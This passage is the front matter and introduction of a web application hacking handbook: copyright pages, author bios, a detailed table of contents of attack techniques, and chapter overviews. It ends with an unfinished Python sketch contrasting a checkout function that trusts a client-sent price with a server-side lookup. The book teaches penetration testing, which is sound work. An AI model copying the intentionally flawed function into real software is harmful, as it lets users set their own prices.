The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws

Dafydd Stuttard

Marcus Pinto

The Web Application

Hacker’s Handbook

Discovering and Exploiting Security Flaws

Wiley Publishing, Inc.

The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws

Published by

Wiley Publishing, Inc.

10475 Crosspoint Boulevard

Indianapolis, IN 46256

www.wiley.com

Published by Wiley Publishing, Inc., Indianapolis, Indiana

Published simultaneously in Canada

ISBN: 978-0-470-17077-9

Manufactured in the United States of America

10 9 8 7 6 5 4 3 2 1

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Legal Department, Wiley Publishing, Inc., 10475 Crosspoint Blvd., Indianapolis, IN 46256, (317) 572-3447, fax (317) 572-4355, or online at http://www.wiley.com/go/permissions.

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Website is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or Website may provide or recommendations it may make. Further, readers should be aware that Internet Websites listed in this work may have changed or disappeared between when this work was written and when it is read.

For general information on our other products and services or to obtain technical support, please contact our Customer Care Department within the U.S. at (800) 762-2974, outside the U.S. at (317) 572-3993 or fax (317) 572-4002.

Library of Congress Cataloging-in-Publication Data

Stuttard, Dafydd, 1972-

The web application hacker's handbook : discovering and exploiting security flaws / Dafydd Stuttard, Marcus Pinto.

p. cm.

Includes index.

ISBN 978-0-470-17077-9 (pbk.)

1. Internet--Security measures. 2. Computer security. I. Pinto, Marcus, 1978- II. Title.

TK5105.875.I57S85 2008

005.8--dc22

2007029983

Trademarks: Wiley and related trade dress are registered trademarks of Wiley Publishing, Inc., in the United States and other countries, and may not be used without written permission. All other trademarks are the property of their respective owners. Wiley Publishing, Inc., is not associated with any product or vendor mentioned in this book.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic books.

About the Authors

Dafydd Stuttard is a Principal Security Consultant at Next Generation Security Software, where he leads the web application security competency. He has nine years’ experience in security consulting and specializes in the penetration testing of web applications and compiled software.

Dafydd has worked with numerous banks, retailers, and other enterprises to help secure their web applications, and has provided security consulting to several software manufacturers and governments to help secure their compiled software. Dafydd is an accomplished programmer in several languages, and his interests include developing tools to facilitate all kinds of software security testing.

Dafydd has developed and presented training courses at the Black Hat security conferences around the world. Under the alias “PortSwigger,” Dafydd created the popular Burp Suite of web application hacking tools. Dafydd holds master’s and doctorate degrees in philosophy from the University of Oxford.

Marcus Pinto is a Principal Security Consultant at Next Generation Security Software, where he leads the database competency development team, and has led the development of NGS’ primary training courses. He has eight years’ experience in security consulting and specializes in penetration testing of web applications and supporting architectures.

Marcus has worked with numerous banks, retailers, and other enterprises to help secure their web applications, and has provided security consulting to the development projects of several security-critical applications. He has worked extensively with large-scale web application deployments in the financial services industry.

Marcus has developed and presented database and web application training courses at the Black Hat and other security conferences around the world. Marcus holds a master’s degree in physics from the University of Cambridge.

Credits

Executive Editor
Carol Long

Development Editor
Adaobi Obi Tulton

Production Editor
Christine O’Connor

Copy Editor
Foxxe Editorial Services

Editorial Manager
Mary Beth Wakefield

Production Manager
Tim Tate

Vice President and Executive Group Publisher
Richard Swadley

Vice President and Executive Publisher
Joseph B. Wikert

Project Coordinator, Cover
Lynsey Osborn

Compositor
Happenstance Type-O-Rama

Proofreader
Kathryn Duggan

Indexer
Johnna VanHoose Dinse

Anniversary Logo Design
Richard Pacifico

Contents

Acknowledgments xxiii

Introduction xxv

Chapter 1 Web Application (In)security 1

The Evolution of Web Applications 2

Common Web Application Functions 3

Benefits of Web Applications 4

Web Application Security 5

“This Site Is Secure” 6

The Core Security Problem: Users Can Submit Arbitrary Input 8

Key Problem Factors 9

Immature Security Awareness 9

In-House Development 9

Deceptive Simplicity 9

Rapidly Evolving Threat Profile 10

Resource and Time Constraints 10

Overextended Technologies 10

The New Security Perimeter 10

The Future of Web Application Security 12

Chapter Summary 13

Chapter 2 Core Defense Mechanisms 15

Handling User Access 16

Authentication 16

Session Management 17

Access Control 18

Handling User Input 19

Varieties of Input 20

Approaches to Input Handling 21

“Reject Known Bad” 21

“Accept Known Good” 21

Sanitization 22

Safe Data Handling 22

Semantic Checks 23

Boundary Validation 23

Multistep Validation and Canonicalization 26

Handling Attackers 27

Handling Errors 27

Maintaining Audit Logs 29

Alerting Administrators 30

Reacting to Attacks 31

Managing the Application 32

Chapter Summary 33

Questions 34

Chapter 3 Web Application Technologies 35

The HTTP Protocol 35

HTTP Requests 36

HTTP Responses 37

HTTP Methods 38

URLs 40

HTTP Headers 41

General Headers 41

Request Headers 41

Response Headers 42

Cookies 43

Status Codes 44

HTTPS 45

HTTP Proxies 46

HTTP Authentication 47

Web Functionality 47

Server-Side Functionality 48

The Java Platform 49

ASP.NET 50

PHP 50

Client-Side Functionality 51

HTML 51

Hyperlinks 51

Forms 52

JavaScript 54

Thick Client Components 54

State and Sessions 55

Encoding Schemes 56

URL Encoding 56

Unicode Encoding 57

HTML Encoding 57

Base64 Encoding 58

Hex Encoding 59

Next Steps 59

Questions 59

Chapter 4 Mapping the Application 61

Enumerating Content and Functionality 62

Web Spidering 62

User-Directed Spidering 65

Discovering Hidden Content 67

Brute-Force Techniques 67

Inference from Published Content 70

Use of Public Information 72

Leveraging the Web Server 75

Application Pages vs. Functional Paths 76

Discovering Hidden Parameters 79

Analyzing the Application 79

Identifying Entry Points for User Input 80

Identifying Server-Side Technologies 82

Banner Grabbing 82

HTTP Fingerprinting 82

File Extensions 84

Directory Names 86

Session Tokens 86

Third-Party Code Components 87

Identifying Server-Side Functionality 88

Dissecting Requests 88

Extrapolating Application Behavior 90

Mapping the Attack Surface 91

Chapter Summary 92

Questions 93

Chapter 5 Bypassing Client-Side Controls 95

Transmitting Data via the Client 95

Hidden Form Fields 96

HTTP Cookies 99

URL Parameters 99

The Referer Header 100

Opaque Data 101

The ASP.NET ViewState 102

Capturing User Data: HTML Forms 106

Length Limits 106

Script-Based Validation 108

Disabled Elements 110

Capturing User Data: Thick-Client Components 111

Java Applets 112

Decompiling Java Bytecode 114

Coping with Bytecode Obfuscation 117

ActiveX Controls 119

Reverse Engineering 120

Manipulating Exported Functions 122

Fixing Inputs Processed by Controls 123

Decompiling Managed Code 124

Shockwave Flash Objects 124

Handling Client-Side Data Securely 128

Transmitting Data via the Client 128

Validating Client-Generated Data 129

Logging and Alerting 131

Chapter Summary 131

Questions 132

Chapter 6 Attacking Authentication 133

Authentication Technologies 134

Design Flaws in Authentication Mechanisms 135

Bad Passwords 135

Brute-Forcible Login 136

Verbose Failure Messages 139

Vulnerable Transmission of Credentials 142

Password Change Functionality 144

Forgotten Password Functionality 145

“Remember Me” Functionality 148

User Impersonation Functionality 149

Incomplete Validation of Credentials 152

Non-Unique Usernames 152

Predictable Usernames 154

Predictable Initial Passwords 154

Insecure Distribution of Credentials 155

Implementation Flaws in Authentication 156

Fail-Open Login Mechanisms 156

Defects in Multistage Login Mechanisms 157

Insecure Storage of Credentials 161

Securing Authentication 162

Use Strong Credentials 162

Handle Credentials Secretively 163

Validate Credentials Properly 164

Prevent Information Leakage 166

Prevent Brute-Force Attacks 167

Prevent Misuse of the Password Change Function 170

Prevent Misuse of the Account Recovery Function 170

Log, Monitor, and Notify 172

Chapter Summary 172

Chapter 7 Attacking Session Management 175

The Need for State 176

Alternatives to Sessions 178

Weaknesses in Session Token Generation 180

Meaningful Tokens 180

Predictable Tokens 182

Concealed Sequences 184

Time Dependency 185

Weak Random Number Generation 187

Weaknesses in Session Token Handling 191

Disclosure of Tokens on the Network 192

Disclosure of Tokens in Logs 196

Vulnerable Mapping of Tokens to Sessions 198

Vulnerable Session Termination 200

Client Exposure to Token Hijacking 201

Liberal Cookie Scope 203

Cookie Domain Restrictions 203

Cookie Path Restrictions 205

Securing Session Management 206

Generate Strong Tokens 206

Protect Tokens throughout Their Lifecycle 208

Per-Page Tokens 211

Log, Monitor, and Alert 212

Reactive Session Termination 212

Chapter Summary 213

Questions 214

Chapter 8 Attacking Access Controls 217

Common Vulnerabilities 218

Completely Unprotected Functionality 219

Identifier-Based Functions 220

Multistage Functions 222

Static Files 222

Insecure Access Control Methods 223

Attacking Access Controls 224

Securing Access Controls 228

A Multi-Layered Privilege Model 231

Chapter Summary 234

Questions 235

Chapter 9 Injecting Code 237

Injecting into Interpreted Languages 238

Injecting into SQL 240

Exploiting a Basic Vulnerability 241

Bypassing a Login 243

Finding SQL Injection Bugs 244

Injecting into Different Statement Types 247

The UNION Operator 251

Fingerprinting the Database 255

Extracting Useful Data 256

An Oracle Hack 257

An MS-SQL Hack 260

Exploiting ODBC Error Messages (MS-SQL Only) 262

Enumerating Table and Column Names 263

Extracting Arbitrary Data 265

Using Recursion 266

Bypassing Filters 267

Second-Order SQL Injection 271

Advanced Exploitation 272

Retrieving Data as Numbers 273

Using an Out-of-Band Channel 274

Using Inference: Conditional Responses 277

Beyond SQL Injection: Escalating the Database Attack 285

MS-SQL 286

Oracle 288

MySQL 288

SQL Syntax and Error Reference 289

SQL Syntax 290

SQL Error Messages 292

Preventing SQL Injection 296

Partially Effective Measures 296

Parameterized Queries 297

Defense in Depth 299

Injecting OS Commands 300

Example 1: Injecting via Perl 300

Example 2: Injecting via ASP 302

Finding OS Command Injection Flaws 304

Preventing OS Command Injection 307

Injecting into Web Scripting Languages 307

Dynamic Execution Vulnerabilities 307

Dynamic Execution in PHP 308

Dynamic Execution in ASP 308

Finding Dynamic Execution Vulnerabilities 309

File Inclusion Vulnerabilities 310

Remote File Inclusion 310

Local File Inclusion 311

Finding File Inclusion Vulnerabilities 312

Preventing Script Injection Vulnerabilities 312

Injecting into SOAP 313

Finding and Exploiting SOAP Injection 315

Preventing SOAP Injection 316

Injecting into XPath 316

Subverting Application Logic 317

Informed XPath Injection 318

Blind XPath Injection 319

Finding XPath Injection Flaws 320

Preventing XPath Injection 321

Injecting into SMTP 321

Email Header Manipulation 322

SMTP Command Injection 323

Finding SMTP Injection Flaws 324

Preventing SMTP Injection 326

Injecting into LDAP 326

Injecting Query Attributes 327

Modifying the Search Filter 328

Finding LDAP Injection Flaws 329

Preventing LDAP Injection 330

Chapter Summary 331

Questions 331

Chapter 10 Exploiting Path Traversal 333

Common Vulnerabilities 333

Finding and Exploiting Path Traversal Vulnerabilities 335

Locating Targets for Attack 335

Detecting Path Traversal Vulnerabilities 336

Circumventing Obstacles to Traversal Attacks 339

Coping with Custom Encoding 342

Exploiting Traversal Vulnerabilities 344

Preventing Path Traversal Vulnerabilities 344

Chapter Summary 346

Questions 346

Chapter 11 Attacking Application Logic 349

The Nature of Logic Flaws 350

Real-World Logic Flaws 350

Example 1: Fooling a Password Change Function 351

The Functionality 351

The Assumption 351

The Attack 352

Example 2: Proceeding to Checkout 352

The Functionality 352

The Assumption 353

The Attack 353

Example 3: Rolling Your Own Insurance 354

The Functionality 354

The Assumption 354

The Attack 355

Example 4: Breaking the Bank 356

The Functionality 356

The Assumption 357

The Attack 358

Example 5: Erasing an Audit Trail 359

The Functionality 359

The Assumption 359

The Attack 359

Example 6: Beating a Business Limit 360

The Functionality 360

The Assumption 361

The Attack 361

Example 7: Cheating on Bulk Discounts 362

The Functionality 362

The Assumption 362

The Attack 362

Example 8: Escaping from Escaping 363

The Functionality 363

The Assumption 364

The Attack 364

Example 9: Abusing a Search Function 365

The Functionality 365

The Assumption 365

The Attack 365

Example 10: Snarfing Debug Messages 366

The Functionality 366

The Assumption 367

The Attack 367

Example 11: Racing against the Login 368

The Functionality 368

The Assumption 368

The Attack 368

Avoiding Logic Flaws 370

Chapter Summary 372

Questions 372

Chapter 12 Attacking Other Users 375

Cross-Site Scripting 376

Reflected XSS Vulnerabilities 377

Exploiting the Vulnerability 379

Stored XSS Vulnerabilities 383

Storing XSS in Uploaded Files 385

DOM-Based XSS Vulnerabilities 386

Real-World XSS Attacks 388

Chaining XSS and Other Attacks 390

Payloads for XSS Attacks 391

Virtual Defacement 391

Injecting Trojan Functionality 392

Inducing User Actions 394

Exploiting Any Trust Relationships 394

Escalating the Client-Side Attack 396

Delivery Mechanisms for XSS Attacks 399

Delivering Reflected and DOM-Based XSS Attacks 399

Delivering Stored XSS Attacks 400

Finding and Exploiting XSS Vulnerabilities 401

Finding and Exploiting Reflected XSS Vulnerabilities 402

Finding and Exploiting Stored XSS Vulnerabilities 415

Finding and Exploiting DOM-Based XSS Vulnerabilities 417

HttpOnly Cookies and Cross-Site Tracing 421

Preventing XSS Attacks 423

Preventing Reflected and Stored XSS 423

Preventing DOM-Based XSS 427

Preventing XST 428

Redirection Attacks 428

Finding and Exploiting Redirection Vulnerabilities 429

Circumventing Obstacles to Attack 431

Preventing Redirection Vulnerabilities 433

HTTP Header Injection 434

Exploiting Header Injection Vulnerabilities 434

Injecting Cookies 435

Delivering Other Attacks 436

HTTP Response Splitting 436

Preventing Header Injection Vulnerabilities 438

Frame Injection 438

Exploiting Frame Injection 439

Preventing Frame Injection 440

Request Forgery 440

On-Site Request Forgery 441

Cross-Site Request Forgery 442

Exploiting XSRF Flaws 443

Preventing XSRF Flaws 444

JSON Hijacking 446

JSON 446

Attacks against JSON 447

Overriding the Array Constructor 447

Implementing a Callback Function 448

Finding JSON Hijacking Vulnerabilities 449

Preventing JSON Hijacking 450

Session Fixation 450

Finding and Exploiting Session Fixation Vulnerabilities 452

Preventing Session Fixation Vulnerabilities 453

Attacking ActiveX Controls 454

Finding ActiveX Vulnerabilities 455

Preventing ActiveX Vulnerabilities 456

Local Privacy Attacks 458

Persistent Cookies 458

Cached Web Content 458

Browsing History 459

Autocomplete 460

Preventing Local Privacy Attacks 460

Advanced Exploitation Techniques 461

Leveraging Ajax 461

Making Asynchronous Off-Site Requests 463

Anti-DNS Pinning 464

A Hypothetical Attack 465

DNS Pinning 466

Attacks against DNS Pinning 466

Browser Exploitation Frameworks 467

Chapter Summary 469

Questions 469

Chapter 13 Automating Bespoke Attacks 471

Uses for Bespoke Automation 472

Enumerating Valid Identifiers 473

The Basic Approach 474

Detecting Hits 474

HTTP Status Code 474

Response Length 475

Response Body 475

Location Header 475

Set-Cookie Header 475

Time Delays 476

Scripting the Attack 476

JAttack 477

Harvesting Useful Data 484

Fuzzing for Common Vulnerabilities 487

Putting It All Together: Burp Intruder 491

Positioning Payloads 492

Choosing Payloads 493

Configuring Response Analysis 494

Attack 1: Enumerating Identifiers 495

Attack 2: Harvesting Information 498

Attack 3: Application Fuzzing 500

Chapter Summary 502

Questions 502

Chapter 14 Exploiting Information Disclosure 505

Exploiting Error Messages 505

Script Error Messages 506

Stack Traces 507

Informative Debug Messages 508

Server and Database Messages 509

Using Public Information 511

Engineering Informative Error Messages 512

Gathering Published Information 513

Using Inference 514

Preventing Information Leakage 516

Use Generic Error Messages 516

Protect Sensitive Information 517

Minimize Client-Side Information Leakage 517

Chapter Summary 518

Questions 518

Chapter 15 Attacking Compiled Applications 521

Buffer Overflow Vulnerabilities 522

Stack Overflows 522

Heap Overflows 523

“Off-by-One” Vulnerabilities 524

Detecting Buffer Overflow Vulnerabilities 527

Integer Vulnerabilities 529

Integer Overflows 529

Signedness Errors 529

Detecting Integer Vulnerabilities 530

Format String Vulnerabilities 531

Detecting Format String Vulnerabilities 532

Chapter Summary 533

Questions 534

Chapter 16 Attacking Application Architecture 535

Tiered Architectures 535

Attacking Tiered Architectures 536

Exploiting Trust Relationships between Tiers 537

Subverting Other Tiers 538

Attacking Other Tiers 539

Securing Tiered Architectures 540

Minimize Trust Relationships 540

Segregate Different Components 541

Apply Defense in Depth 542

Shared Hosting and Application Service Providers 542

Virtual Hosting 543

Shared Application Services 543

Attacking Shared Environments 544

Attacks against Access Mechanisms 545

Attacks between Applications 546

Securing Shared Environments 549

Secure Customer Access 549

Segregate Customer Functionality 550

Segregate Components in a Shared Application 551

Chapter Summary 551

Questions 551

Chapter 17 Attacking the Web Server 553

Vulnerable Web Server Configuration 553

Default Credentials 554

Default Content 555

Debug Functionality 555

Sample Functionality 556

Powerful Functions 557

Directory Listings 559

Dangerous HTTP Methods 560

The Web Server as a Proxy 562

Misconfigured Virtual Hosting 564

Securing Web Server Configuration 565

Vulnerable Web Server Software 566

Buffer Overflow Vulnerabilities 566

Microsoft IIS ISAPI Extensions 567

Apache Chunked Encoding Overflow 567

Microsoft IIS WebDav Overflow 567

iPlanet Search Overflow 567

Path Traversal Vulnerabilities 568

Accipiter DirectServer 568

Alibaba 568

Cisco ACS Acme.server 568

McAfee ePolicy Orchestrator 568

Encoding and Canonicalization Vulnerabilities 568

Allaire JRun Directory Listing Vulnerability 569

Microsoft IIS Unicode Path Traversal Vulnerabilities 569

Oracle PL/SQL Exclusion List Bypasses 570

Finding Web Server Flaws 571

Securing Web Server Software 572

Choose Software with a Good Track Record 572

Apply Vendor Patches 572

Perform Security Hardening 573

Monitor for New Vulnerabilities 573

Use Defense-in-Depth 573

Chapter Summary 574

Questions 574

Chapter 18 Finding Vulnerabilities in Source Code 577

Approaches to Code Review 578

Black-Box vs. White-Box Testing 578

Code Review Methodology 579

Signatures of Common Vulnerabilities 580

Cross-Site Scripting 580

SQL Injection 581

Path Traversal 582

Arbitrary Redirection 583

OS Command Injection 584

Backdoor Passwords 584

Native Software Bugs 585

Buffer Overflow Vulnerabilities 585

Integer Vulnerabilities 586

Format String Vulnerabilities 586

Source Code Comments 586

The Java Platform 587

Identifying User-Supplied Data 587

Session Interaction 589

Potentially Dangerous APIs 589

File Access 589

Database Access 590

Dynamic Code Execution 591

OS Command Execution 591

URL Redirection 592

Sockets 592

Configuring the Java Environment 593

ASP.NET 594

Identifying User-Supplied Data 594

Session Interaction 595

Potentially Dangerous APIs 596

File Access 596

Database Access 597

Dynamic Code Execution 598

OS Command Execution 598

URL Redirection 599

Sockets 600

Configuring the ASP.NET Environment 600

PHP 601

Identifying User-Supplied Data 601

Session Interaction 603

Potentially Dangerous APIs 604

File Access 604

Database Access 606

Dynamic Code Execution 607

OS Command Execution 607

URL Redirection 608

Sockets 608

Configuring the PHP Environment 609

Safe Mode 610

Magic Quotes 610

Miscellaneous 611

Perl 611

Identifying User-Supplied Data 612

Session Interaction 613

Potentially Dangerous APIs 613

File Access 613

Database Access 613

Dynamic Code Execution 614

OS Command Execution 614

URL Redirection 615

Sockets 615

Configuring the Perl Environment 615

JavaScript 616

Database Code Components 617

SQL Injection 617

Calls to Dangerous Functions 618

Tools for Code Browsing 619

Chapter Summary 620

Questions 621

Chapter 19 A Web Application Hacker’s Toolkit 623

Web Browsers 624

Internet Explorer 624

Firefox 624

Opera 626

Integrated Testing Suites 627

How the Tools Work 628

Intercepting Proxies 628

Web Application Spiders 633

Application Fuzzers and Scanners 636

Manual Request Tools 637

Feature Comparison 640

Burp Suite 643

Paros 644

WebScarab 645

Alternatives to the Intercepting Proxy 646

Tamper Data 647

TamperIE 647

Vulnerability Scanners 649

Vulnerabilities Detected by Scanners 649

Inherent Limitations of Scanners 651

Every Web Application Is Different 652

Scanners Operate on Syntax 652

Scanners Do Not Improvise 652

Scanners Are Not Intuitive 653

Technical Challenges Faced by Scanners 653

Authentication and Session Handling 653

Dangerous Effects 654

Individuating Functionality 655

Other Challenges to Automation 655

Current Products 656

Using a Vulnerability Scanner 658

Other Tools 659

Nikto 660

Hydra 660

Custom Scripts 661

Wget 662

Curl 662

Netcat 663

Stunnel 663

Chapter Summary 664

Chapter 20 A Web Application Hacker’s Methodology 665

General Guidelines 667

1. Map the Application’s Content 669

1.1. Explore Visible Content 669

1.2. Consult Public Resources 670

1.3. Discover Hidden Content 670

1.4. Discover Default Content 671

1.5. Enumerate Identifier-Specified Functions 671

1.6. Test for Debug Parameters 672

2. Analyze the Application 672

2.1. Identify Functionality 673

2.2. Identify Data Entry Points 673

2.3. Identify the Technologies Used 673

2.4. Map the Attack Surface 674

3. Test Client-Side Controls 675

3.1. Test Transmission of Data via the Client 675

3.2. Test Client-Side Controls over User Input 676

3.3. Test Thick-Client Components 677

3.3.1. Test Java Applets 677

3.3.2. Test ActiveX Controls 678

3.3.3. Test Shockwave Flash Objects 678

4. Test the Authentication Mechanism 679

4.1. Understand the Mechanism 680

4.2. Test Password Quality 680

4.3. Test for Username Enumeration 680

4.4. Test Resilience to Password Guessing 681

4.5. Test Any Account Recovery Function 682

4.6. Test Any Remember Me Function 682

4.7. Test Any Impersonation Function 683

4.8. Test Username Uniqueness 683

4.9. Test Predictability of Auto-Generated Credentials 684

4.10. Check for Unsafe Transmission of Credentials 684

4.11. Check for Unsafe Distribution of Credentials 685

4.12. Test for Logic Flaws 685

4.12.1. Test for Fail-Open Conditions 685

4.12.2. Test Any Multistage Mechanisms 686

4.13. Exploit Any Vulnerabilities to Gain Unauthorized Access 687

5. Test the Session Management Mechanism 688

5.1. Understand the Mechanism 689

5.2. Test Tokens for Meaning 689

5.3. Test Tokens for Predictability 690

5.4. Check for Insecure Transmission of Tokens 691

5.5. Check for Disclosure of Tokens in Logs 692

5.6. Check Mapping of Tokens to Sessions 692

5.7. Test Session Termination 693

5.8. Check for Session Fixation 694

5.9. Check for XSRF 694

5.10. Check Cookie Scope 695

6. Test Access Controls 696

6.1. Understand the Access Control Requirements 696

6.2. Testing with Multiple Accounts 697

6.3. Testing with Limited Access 697

6.4. Test for Insecure Access Control Methods 698

7. Test for Input-Based Vulnerabilities 699

7.1. Fuzz All Request Parameters 699

7.2. Test for SQL Injection 702

7.3. Test for XSS and Other Response Injection 704

7.3.1. Identify Reflected Request Parameters 704

7.3.2. Test for Reflected XSS 705

7.3.3. Test for HTTP Header Injection 705

7.3.4. Test for Arbitrary Redirection 706

7.3.5. Test for Stored Attacks 706

7.4. Test for OS Command Injection 707

7.5. Test for Path Traversal 709

7.6. Test for Script Injection 711

7.7. Test for File Inclusion 711

8. Test for Function-Specific Input Vulnerabilities 712

8.1. Test for SMTP Injection 712

8.2. Test for Native Software Vulnerabilities 713

8.2.1. Test for Buffer Overflows 713

8.2.2. Test for Integer Vulnerabilities 714

8.2.3. Test for Format String Vulnerabilities 714

8.3. Test for SOAP Injection 715

8.4. Test for LDAP Injection 715

8.5. Test for XPath Injection 716

9. Test for Logic Flaws 717

9.1. Identify the Key Attack Surface 717

9.2. Test Multistage Processes 718

9.3. Test Handling of Incomplete Input 718

9.4. Test Trust Boundaries 719

9.5. Test Transaction Logic 719

10. Test for Shared Hosting Vulnerabilities 720

10.1. Test Segregation in Shared Infrastructures 720

10.2. Test Segregation between ASP-Hosted Applications 721

11. Test for Web Server Vulnerabilities 721

11.1. Test for Default Credentials 722

11.2. Test for Default Content 722

11.3. Test for Dangerous HTTP Methods 722

11.4. Test for Proxy Functionality 723

11.5. Test for Virtual Hosting Misconfiguration 723

11.6. Test for Web Server Software Bugs 723

12. Miscellaneous Checks 724

12.1. Check for DOM-Based Attacks 724

12.2. Check for Frame Injection 725

12.3. Check for Local Privacy Vulnerabilities 726

12.4. Follow Up Any Information Leakage 726

12.5. Check for Weak SSL Ciphers 727

Index 729

Acknowledgments

Our primary debt is to the directors and our other colleagues at Next Generation Security Software, who have provided a creative working environment, promoted sharing of knowledge, and supported us during the months spent producing this book. In particular, we received direct assistance from Chris Anley, Dave Armstrong, Dominic Beecher, David Litchfield, Adam Matthews, Dave Spencer, and Peter Winter-Smith.

In addition to our immediate colleagues, we are greatly indebted to the wider community of researchers who have shared their ideas and contributed to the collective understanding of web application security issues that exists today. Because this is a practical handbook rather than a work of scholarship, we deliberately avoided filling it with a thousand citations of influential articles, books, and blog postings which spawned the ideas involved. We hope that people whose work we discuss anonymously are content with the general credit given here.

We are grateful to the people at Wiley, in particular to Carol Long for enthusiastically supporting our project from the outset, to Adaobi Obi Tulton for helping to polish our manuscript and coaching us in the quirks of “American English,” and to Christine O’Connor’s team for delivering a first-rate production.

A large measure of thanks is due to our respective partners, Becky and Susan, for tolerating the significant distraction and time involved in producing a book of this size.

Both authors are indebted to the people who led us into our unusual line of work. Dafydd would like to thank Martin Law. Martin is a great guy who first taught me how to hack, and encouraged me to spend my time developing techniques and tools for attacking applications. Marcus would like to thank his parents for a great many things, a significant one being getting me into computers. I’ve been getting into computers ever since.

This book is a practical guide to discovering and exploiting security flaws in

web applications. By “web application” we mean an application that is accessed

by using a web browser to communicate with a web server. We examine a wide

variety of different technologies, such as databases, file systems, and web ser-

vices, but only in the context in which these are employed by web applications.

If you want to learn how to run port scans, attack firewalls, or break into

servers in other ways, we suggest you look elsewhere. But if you want to know

how to hack into a web application, steal sensitive data, and perform unau-

thorized actions, then this is the book for you. There is enough that is interest-

ing and fun to say on that subject without straying into any other territory.

Overview of This Book

The focus of this book is highly practical. While we include sufficient back-

ground and theory for you to understand the vulnerabilities that web applica-

tions contain, our primary concern is with the tasks and techniques that you

need to master in order to break into them. Throughout the book, we spell out

the specific steps that you need to take to detect each type of vulnerability, and

how to exploit it to perform unauthorized actions. We also include a wealth of

real-world examples, derived from the authors’ many years of experience, illus-

trating how different kinds of security flaw manifest themselves in today’s web

applications.

Security awareness is usually a two-edged sword. Just as application devel-

opers can benefit from understanding the methods used by attackers, hackers

Introduction

can gain from knowing how applications can effectively defend themselves. In

addition to describing security vulnerabilities and attack techniques, we also

describe in detail the countermeasures that applications can take to thwart an

attacker. For those of you who perform penetration tests of web applications,

this will enable you to provide high-quality remediation advice to the owners

of the applications you compromise.

Who Should Read This Book

The primary audience for this book is anyone with a personal or professional

interest in attacking web applications. It is also aimed at anyone responsible

for developing and administering web applications — knowing how your

enemy operates will help you to defend against them.

We assume that the reader is familiar with core security concepts, such as

logins and access controls, and has a basic grasp of core web technologies,

such as browsers, web servers, and HTTP. However, any gaps in your current

knowledge of these areas will be easy to remedy, through either the explana-

tions contained within this book or references elsewhere.

In the course of illustrating many categories of security flaws, we provide

code extracts showing how applications can be vulnerable. These examples

are simple enough to be understood without any prior knowledge of the lan-

guage in question but will be most useful if you have some basic experience of

reading or writing code.

How This Book Is Organized

This book is organized roughly in line with the dependencies between the dif-

ferent topics covered. If you are new to web application hacking, you should

read the book through from start to finish, acquiring the knowledge and under-

standing you need to tackle later chapters. If you already have some experience

in this area, you can jump straight into any chapter or subsection that particu-

larly interests you. Where necessary, we have included cross-references to other

chapters, which you can use to fill in any gaps in your understanding.

We begin with three context-setting chapters describing the current state of

web application security and the trends that indicate how it is likely to evolve

in the near future. We examine the core security problem affecting web appli-

cations and the defense mechanisms that applications implement to address

this problem. We also provide a primer in the key technologies used in today’s

web applications.

The bulk of the book is concerned with our core topic — the techniques that

you can use to break into web applications. This material is organized around

the key tasks that you need to perform to carry out a comprehensive attack:

from mapping the application’s functionality, scrutinizing and attacking its

core defense mechanisms, to probing for specific categories of security flaws.

The book concludes with three chapters that pull together the various

strands introduced within the book. We describe the process of finding vul-

nerabilities in an application’s source code, review the tools that can assist you

when hacking web applications, and present a detailed methodology for per-

forming a comprehensive and deep attack against a specific target.

Chapter 1, “Web Application (In)security,” describes the current state of

security in web applications on the Internet today. Despite common assur-

ances, the majority of applications are insecure and can be compromised in

some way with a modest degree of skill. Vulnerabilities in web applications

arise because of a single core problem: users can submit arbitrary input. In this

chapter, we examine the key factors that contribute to the weak security pos-

ture of today’s applications, and describe how defects in web applications can

leave an organization’s wider technical infrastructure highly vulnerable to

attack.

Chapter 2, “Core Defense Mechanisms,” describes the key security mecha-

nisms that web applications employ to address the fundamental problem that

all user input is untrusted. These mechanisms are the means by which an

application manages user access, handles user input, and responds to attack-

ers, and the functions provided for administrators to manage and monitor the

application itself. The application’s core security mechanisms also represent

its primary attack surface, and you need to understand how these mechanisms

are intended to function before you can effectively attack them.

Chapter 3, “Web Application Technologies,” provides a short primer on the

key technologies that you are likely to encounter when attacking web applica-

tions. This covers all relevant aspects of the HTTP protocol, the technologies

commonly used on the client and server sides, and various schemes used for

encoding data. If you are already familiar with the main web technologies,

then you can quickly skim through this chapter.

Chapter 4, “Mapping the Application,” describes the first exercise that you

need to undertake when targeting a new application, which is to gather as much

information as possible about it, in order to map its attack surface and formu-

late your plan of attack. This process includes exploring and probing the appli-

cation to catalogue all of its content and functionality, identifying all of the

entry points for user input and discovering the technologies in use.

Chapter 5, “Bypassing Client-Side Controls,” describes the first area of

actual vulnerability, which arises when an application relies upon controls

implemented on the client side for its security. This approach is normally

flawed, because any client-side controls can, of course, be circumvented. The

two main ways in which applications make themselves vulnerable are (a) to

transmit data via the client in the assumption that this will not be modified,

and (b) to rely upon client-side checks on user input. In this chapter, we exam-

ine a range of interesting technologies, including lightweight controls imple-

mented within HTML, HTTP, and JavaScript, and more heavyweight controls

using Java applets, ActiveX controls, and Shockwave Flash objects.
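
As a minimal sketch of flaw (a), consider a hypothetical checkout handler that receives the item price back from the browser in a hidden form field. The catalogue, field names, and function names here are illustrative assumptions, not taken from any real application.

```python
# Hypothetical server-side price list; all names are illustrative only.
CATALOGUE = {"book": 4999}  # price in cents


def total_trusting_client(form: dict) -> int:
    """Flawed: uses the price that travelled through the browser."""
    return int(form["price"]) * int(form["quantity"])


def total_server_side(form: dict) -> int:
    """Safer: ignores any client-supplied price and looks it up on the server."""
    quantity = int(form["quantity"])
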